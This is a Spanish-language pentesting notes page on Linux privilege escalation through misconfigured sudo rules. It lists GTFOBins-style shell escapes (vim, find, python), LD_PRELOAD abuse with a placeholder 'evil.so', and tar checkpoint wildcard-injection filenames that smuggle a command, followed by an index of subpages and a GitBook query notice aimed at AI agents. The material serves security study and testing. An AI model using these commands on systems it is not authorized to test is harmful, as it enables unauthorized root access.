> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/privesc/sudoers.md).

# Sudoers

La escalada de privilegios en sudoers comienza con los comandos que un usuario puede ejecutar mediante `sudo`. Los binarios mal configurados, los argumentos de script inseguros, el manejo de enlaces simbólicos y las versiones vulnerables de sudo pueden convertir permisos limitados de sudo en una shell de root.

## Metodología

* Ejecuta `sudo -l` y documenta cada comando permitido, usuario objetivo y regla NOPASSWD.
* Consulta GTFOBins para escapes de shell, escrituras de archivos y ejecución controlada por argumentos.
* Revisa los scripts en busca de rutas escribibles, manejo de enlaces simbólicos, expansión de comodines y referencias a archivos faltantes.
* Comprueba `sudo --version` cuando la ruta dependa de una CVE conocida de sudo.

## Comprobaciones rápidas

```bash
sudo -l
sudo --version
```

## Abusos comunes de sudo

Cuando `sudo -l` expone un comando, comprueba si ese comando puede abrir una shell, escribir archivos, seguir enlaces simbólicos, cargar complementos o expandir comodines controlados por el atacante.

```bash
sudo -i
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

### Conservación de variables de entorno

Si `env_keep` conserva variables del cargador, `LD_PRELOAD` o `LD_LIBRARY_PATH` puede resultar útil. Confirma primero la regla de sudoers:

```bash
sudo -l
sudo LD_PRELOAD=/tmp/evil.so program
```

### Explotación de comodines

El abuso de comodines aparece cuando una regla de sudo ejecuta un comando sobre nombres de archivo controlados por el atacante, por ejemplo trabajos de copia de seguridad que usan `*.conf` o archivos comprimidos que usan `*`.

```bash
echo 'command' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo awk</h4></td><td>Notas de Sudo (awk) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/88ae1ec3fe5409c640d2bff41f65561f4e06446d">/pages/88ae1ec3fe5409c640d2bff41f65561f4e06446d</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Nmap</h4></td><td>Notas de Sudo (Nmap) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/635a62a8ce80933e85c519576575c3e48cda2328">/pages/635a62a8ce80933e85c519576575c3e48cda2328</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Perl</h4></td><td>Notas de Sudo (Perl) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/e0f9c306158d1939dda20072ed63e2aab96a09bf">/pages/e0f9c306158d1939dda20072ed63e2aab96a09bf</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo GitPython</h4></td><td>Notas de Sudo (GitPython) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/6c46473f4dab3f2d22f414320bacd25e9ea133ec">/pages/6c46473f4dab3f2d22f414320bacd25e9ea133ec</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>CVE de la versión de Sudo</h4></td><td>Notas de vulnerabilidades de la versión de Sudo para la escalada de privilegios en Linux CVE-2019-14287 y CVE-2025-32463.</td><td><a href="/pages/210fa36fecb4c423038caceb511668e4c9ee9209">/pages/210fa36fecb4c423038caceb511668e4c9ee9209</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo su</h4></td><td>Notas de Sudo (su) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/70074f38b65d3a37664d7ad77423055d8abd7b87">/pages/70074f38b65d3a37664d7ad77423055d8abd7b87</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Knife</h4></td><td>Notas de Sudo (Knife) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/a3022db6f3e1e8ccdc5550c2cf0123f74f3b9c7a">/pages/a3022db6f3e1e8ccdc5550c2cf0123f74f3b9c7a</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo ALL:ALL</h4></td><td>Notas de Sudo (ALL:ALL) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/9378eb0b9f3f175e3e8c90cb2f80f00b9221d2a5">/pages/9378eb0b9f3f175e3e8c90cb2f80f00b9221d2a5</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo mosh-server</h4></td><td>Notas de Sudo (Mosh-Server) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/8b74279cd4b810e8323a0dc5ba486b23816b9df3">/pages/8b74279cd4b810e8323a0dc5ba486b23816b9df3</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo iptables</h4></td><td>Notas de Sudo (iptables) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/9de52e0affa06461d994c1b454dd8faf622811b3">/pages/9de52e0affa06461d994c1b454dd8faf622811b3</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Go</h4></td><td>Notas de Sudo (Go) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/4aa39282ad9dec981755d43b2a8da75fb734c111">/pages/4aa39282ad9dec981755d43b2a8da75fb734c111</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo journalctl</h4></td><td>Notas de Sudo (journalctl) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/7e9f618dca56699148a544b25cfaaf19e4a198c1">/pages/7e9f618dca56699148a544b25cfaaf19e4a198c1</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Metasploit</h4></td><td>Notas de Sudo (Metasploit) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/5c320424077f1e24bcf1e48e4718bca656ae316e">/pages/5c320424077f1e24bcf1e48e4718bca656ae316e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Archivo faltante</h4></td><td>Notas de Sudo (archivo no encontrado) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/9cfd2388c294ecc762294f2eb0660755839e3511">/pages/9cfd2388c294ecc762294f2eb0660755839e3511</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo binario bee</h4></td><td>Notas de Sudo (binario bee) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/8583d217efe763616ac9b30c9cb3943b63f133c4">/pages/8583d217efe763616ac9b30c9cb3943b63f133c4</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo binario bbot</h4></td><td>Notas de Sudo (binario bbot) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/8bf46c95bbeb385603a52415f626a440600e8312">/pages/8bf46c95bbeb385603a52415f626a440600e8312</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo abuso de enlace simbólico ACL</h4></td><td>Notas de Sudo ACL / enlace simbólico para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/9468be9c343544926ce0bf23b947255df310239b">/pages/9468be9c343544926ce0bf23b947255df310239b</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo doble enlace simbólico</h4></td><td>Notas de Sudo (doble enlace simbólico) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/f0b3c24da7a1bf1c9b99a778be385fe291e378b4">/pages/f0b3c24da7a1bf1c9b99a778be385fe291e378b4</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo binario de copia de seguridad con enlace simbólico</h4></td><td>Notas de Sudo (binario de copia de seguridad / enlace simbólico) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/8da5a4043a9f2fc94a9644975862fa64eed714c7">/pages/8da5a4043a9f2fc94a9644975862fa64eed714c7</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Script backy.sh de Sudo</h4></td><td>Notas de Sudo - backy.sh (script) para la escalada de privilegios en Linux, con pasos de enumeración, ejemplos de explotación y validación orientada a informes.</td><td><a href="/pages/3cc02b6814c5a53b89af48902194a572c29b07c0">/pages/3cc02b6814c5a53b89af48902194a572c29b07c0</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/privesc/sudoers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
